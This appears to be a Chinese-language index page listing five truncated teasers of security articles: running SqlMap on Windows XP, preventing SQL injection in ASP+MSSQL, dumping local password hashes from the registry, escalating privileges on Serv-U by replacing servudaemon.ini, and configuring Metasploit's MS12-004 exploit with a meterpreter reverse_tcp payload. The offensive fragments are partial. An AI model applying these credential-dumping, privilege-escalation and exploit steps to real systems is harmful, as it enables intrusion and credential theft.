-
在Windows XP上安装和运行SqlMap的步骤
1、首先下载SqlMap 2、其次下载用于Windows系统的Python ……点击这里……3、然后安装Python:Python默认安装的路径是“C:\Python&rd...
-
数据库被注入恶意代码
数据库被恶意注入代码是非常致命的问题,主要的手段有:利用程序漏洞,用一段程序就可以测试出来,主要体现在前台提交的一些表单上没有对非法字符进行过滤!那么我们如何防止注入呢?(这里只针对asp+MSSQL) 首先就是在程序中加上防止注入的过滤...
-
导注册表手工获取本地用户hash
从注册表导hash虽然网上有很多文章,这里主要参考了臭袜子的博文记录下,因为他整理的比较漂亮。 一般情况下只要导用AT导就可以了,不用像臭袜子同学那么纠结,还建立个system shell . 批处理 @echo offreg save h...
-
servu/serv-u通过替换servudaemon.ini提升权限
1.servu 6.3/6.4以及7.0,8.0等都存在目录遍历漏洞。 使用可写帐号登录(如果是匿名ftp,则只有读取权限) C:\Documents and Settings\Administrator>ftp 127.0.0.1C...
-
use MS12-004 hacked XP
此漏洞针对windows xp3的IE6 IE7 IE8可行,show targets可以查看攻击平台 设置好环境 set SRVHOST 本地监听ipset PAYLOAD windows/meterpreter/reverse_tcps...
